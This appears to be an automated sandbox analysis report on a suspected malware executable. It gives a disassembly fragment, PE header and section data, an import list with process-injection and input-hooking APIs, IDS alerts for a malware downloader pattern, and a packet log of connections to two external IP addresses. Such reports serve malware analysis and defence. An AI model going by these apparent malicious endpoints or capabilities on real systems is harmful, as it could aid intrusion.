                                                                              mov eax, ecx
                                                                              mov edx, ecx
                                                                              add eax, esi
                                                                              cmp edi, esi
                                                                              jbe 00007FDBA8D21A2Ah
                                                                              cmp edi, eax
                                                                              jc 00007FDBA8D21BC6h
                                                                              cmp ecx, 00000080h
                                                                              jc 00007FDBA8D21A3Eh
                                                                              cmp dword ptr [004A9724h], 00000000h
                                                                              je 00007FDBA8D21A35h
                                                                              push edi
                                                                              push esi
                                                                              and edi, 0Fh
                                                                              and esi, 0Fh
                                                                              cmp edi, esi
                                                                              pop esi
                                                                              pop edi
                                                                              jne 00007FDBA8D21A27h
                                                                              jmp 00007FDBA8D21E02h
                                                                              test edi, 00000003h
                                                                              jne 00007FDBA8D21A36h
                                                                              shr ecx, 02h
                                                                              and edx, 03h
                                                                              cmp ecx, 08h
                                                                              jc 00007FDBA8D21A4Bh
                                                                              rep movsd
                                                                              jmp dword ptr [00416740h+edx*4]
                                                                              mov eax, edi
                                                                              mov edx, 00000003h
                                                                              sub ecx, 04h
                                                                              jc 00007FDBA8D21A2Eh
                                                                              and eax, 03h
                                                                              add ecx, eax
                                                                              jmp dword ptr [00416654h+eax*4]
                                                                              jmp dword ptr [00416750h+ecx*4]
                                                                              nop
                                                                              jmp dword ptr [004166D4h+ecx*4]
                                                                              nop
                                                                              inc cx
                                                                              add byte ptr [eax-4BFFBE9Ah], dl
                                                                              inc cx
                                                                              add byte ptr [ebx], ah
                                                                              ror dword ptr [edx-75F877FAh], 1
                                                                              inc esi
                                                                              add dword ptr [eax+468A0147h], ecx
                                                                              add al, cl
                                                                              jmp 00007FDBAB19A227h
                                                                              add esi, 03h
                                                                              add edi, 03h
                                                                              cmp ecx, 08h
                                                                              jc 00007FDBA8D219EEh
                                                                              rep movsd
                                                                              jmp dword ptr [00000000h+edx*4]

                                                                              Rich Headers

                                                                              Programming Language:
                                                                              • [ C ] VS2010 SP1 build 40219
                                                                              • [C++] VS2010 SP1 build 40219
                                                                              • [ C ] VS2008 SP1 build 30729
                                                                              • [IMP] VS2008 SP1 build 30729
                                                                              • [ASM] VS2010 SP1 build 40219
                                                                              • [RES] VS2010 SP1 build 40219
                                                                              • [LNK] VS2010 SP1 build 40219

                                                                              Data Directories

                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                              Sections

                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                              Resources

                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                              RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                              RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                              RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                              RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                                              RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                                              RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                                              RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                                              RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                                              RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                                              RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                                              RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                                              RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                                              RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                                              RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                                              RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                                              RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                                              RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
                                                                              RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
                                                                              RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
                                                                              RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
                                                                              RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                              RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
                                                                              RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
                                                                              RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
                                                                              RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
                                                                              RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
                                                                              RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                                                                              Imports

                                                                              DLLImport
                                                                              WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                              VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                              WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                              COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                              MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                              WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                              PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                              USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                              KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                                                              USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                                                              GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                                                              COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                              ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                                                              SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                              ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                                                              OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit

                                                                              Possible Origin

                                                                              Language of compilation systemCountry where language is spokenMap
                                                                              EnglishGreat Britain
                                                                              EnglishUnited States

                                                                              Network Behavior

                                                                              Suricata IDS Alerts

                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                              2024-10-09T14:45:15.644619+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1249711193.122.6.16880TCP
                                                                              2024-10-09T14:45:16.566496+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1249711193.122.6.16880TCP
                                                                              2024-10-09T14:45:17.147222+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1249713188.114.96.3443TCP
                                                                              2024-10-09T14:45:17.798405+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1249714193.122.6.16880TCP
                                                                              2024-10-09T14:45:19.102713+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1249715188.114.96.3443TCP
                                                                              2024-10-09T14:45:23.944483+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1249722188.114.96.3443TCP

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Oct 9, 2024 14:45:13.872833014 CEST4971180192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:13.877954960 CEST8049711193.122.6.168192.168.2.12
                                                                              Oct 9, 2024 14:45:13.878035069 CEST4971180192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:13.878197908 CEST4971180192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:13.883074999 CEST8049711193.122.6.168192.168.2.12
                                                                              Oct 9, 2024 14:45:15.409717083 CEST8049711193.122.6.168192.168.2.12
                                                                              Oct 9, 2024 14:45:15.410913944 CEST8049711193.122.6.168192.168.2.12
                                                                              Oct 9, 2024 14:45:15.411158085 CEST4971180192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:15.412327051 CEST8049711193.122.6.168192.168.2.12
                                                                              Oct 9, 2024 14:45:15.412369013 CEST4971180192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:15.413544893 CEST4971180192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:15.414058924 CEST8049711193.122.6.168192.168.2.12
                                                                              Oct 9, 2024 14:45:15.414105892 CEST4971180192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:15.420595884 CEST8049711193.122.6.168192.168.2.12
                                                                              Oct 9, 2024 14:45:15.602896929 CEST8049711193.122.6.168192.168.2.12
                                                                              Oct 9, 2024 14:45:15.644618988 CEST4971180192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:15.649770975 CEST49712443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:15.649800062 CEST44349712188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:15.649960995 CEST49712443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:15.657625914 CEST49712443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:15.657634974 CEST44349712188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:16.138748884 CEST44349712188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:16.138959885 CEST49712443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:16.143142939 CEST49712443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:16.143151045 CEST44349712188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:16.143568039 CEST44349712188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:16.191471100 CEST49712443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:16.202811003 CEST49712443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:16.243407011 CEST44349712188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:16.318244934 CEST44349712188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:16.318308115 CEST44349712188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:16.318351984 CEST49712443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:16.323987007 CEST49712443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:16.327049017 CEST4971180192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:16.331885099 CEST8049711193.122.6.168192.168.2.12
                                                                              Oct 9, 2024 14:45:16.514153957 CEST8049711193.122.6.168192.168.2.12
                                                                              Oct 9, 2024 14:45:16.518347025 CEST49713443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:16.518387079 CEST44349713188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:16.518496990 CEST49713443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:16.519412994 CEST49713443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:16.519431114 CEST44349713188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:16.566495895 CEST4971180192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:16.986603022 CEST44349713188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:16.988883018 CEST49713443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:16.988919020 CEST44349713188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:17.147228956 CEST44349713188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:17.147314072 CEST44349713188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:17.147391081 CEST49713443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:17.148200035 CEST49713443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:17.152175903 CEST4971180192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:17.153493881 CEST4971480192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:17.159152985 CEST8049711193.122.6.168192.168.2.12
                                                                              Oct 9, 2024 14:45:17.159209967 CEST4971180192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:17.159872055 CEST8049714193.122.6.168192.168.2.12
                                                                              Oct 9, 2024 14:45:17.159934044 CEST4971480192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:17.160048008 CEST4971480192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:17.166389942 CEST8049714193.122.6.168192.168.2.12
                                                                              Oct 9, 2024 14:45:17.787153006 CEST8049714193.122.6.168192.168.2.12
                                                                              Oct 9, 2024 14:45:17.798404932 CEST4971480192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:17.799313068 CEST49715443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:17.799345016 CEST44349715188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:17.799416065 CEST49715443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:17.799729109 CEST49715443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:17.799741030 CEST44349715188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:17.803636074 CEST8049714193.122.6.168192.168.2.12
                                                                              Oct 9, 2024 14:45:17.803679943 CEST4971480192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:18.931651115 CEST44349715188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:18.933991909 CEST49715443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:18.934012890 CEST44349715188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:19.102739096 CEST44349715188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:19.102864981 CEST44349715188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:19.102915049 CEST49715443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:19.103457928 CEST49715443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:19.108974934 CEST4971680192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:19.114077091 CEST8049716193.122.6.168192.168.2.12
                                                                              Oct 9, 2024 14:45:19.114185095 CEST4971680192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:19.115308046 CEST4971680192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:19.122852087 CEST8049716193.122.6.168192.168.2.12
                                                                              Oct 9, 2024 14:45:19.741142988 CEST8049716193.122.6.168192.168.2.12
                                                                              Oct 9, 2024 14:45:19.742908001 CEST49717443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:19.742937088 CEST44349717188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:19.743032932 CEST49717443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:19.743408918 CEST49717443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:19.743423939 CEST44349717188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:19.785259962 CEST4971680192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:21.024074078 CEST44349717188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:21.026021957 CEST49717443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:21.026038885 CEST44349717188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:21.410423040 CEST44349717188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:21.411019087 CEST44349717188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:21.411082983 CEST49717443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:21.411465883 CEST49717443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:21.414938927 CEST4971680192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:21.416062117 CEST4971880192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:21.420272112 CEST8049716193.122.6.168192.168.2.12
                                                                              Oct 9, 2024 14:45:21.420346022 CEST4971680192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:21.420851946 CEST8049718193.122.6.168192.168.2.12
                                                                              Oct 9, 2024 14:45:21.420923948 CEST4971880192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:21.421016932 CEST4971880192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:21.425878048 CEST8049718193.122.6.168192.168.2.12
                                                                              Oct 9, 2024 14:45:22.046936035 CEST8049718193.122.6.168192.168.2.12
                                                                              Oct 9, 2024 14:45:22.048218012 CEST49720443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:22.048233032 CEST44349720188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:22.048769951 CEST49720443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:22.049060106 CEST49720443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:22.049071074 CEST44349720188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:22.097760916 CEST4971880192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:22.530431032 CEST44349720188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:22.532004118 CEST49720443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:22.532040119 CEST44349720188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:22.681343079 CEST44349720188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:22.681566000 CEST44349720188.114.96.3192.168.2.12
                                                                              Oct 9, 2024 14:45:22.681685925 CEST49720443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:22.682172060 CEST49720443192.168.2.12188.114.96.3
                                                                              Oct 9, 2024 14:45:22.685039043 CEST4971880192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:22.686273098 CEST4972180192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:22.690510988 CEST8049718193.122.6.168192.168.2.12
                                                                              Oct 9, 2024 14:45:22.690594912 CEST4971880192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:22.691222906 CEST8049721193.122.6.168192.168.2.12
                                                                              Oct 9, 2024 14:45:22.691299915 CEST4972180192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:22.691395998 CEST4972180192.168.2.12193.122.6.168
                                                                              Oct 9, 2024 14:45:22.696265936 CEST8049721193.122.6.168192.168.2.12
                                                                              Oct 9, 2024 14:45:23.316754103 CEST8049721193.122.6.168192.168.2.12
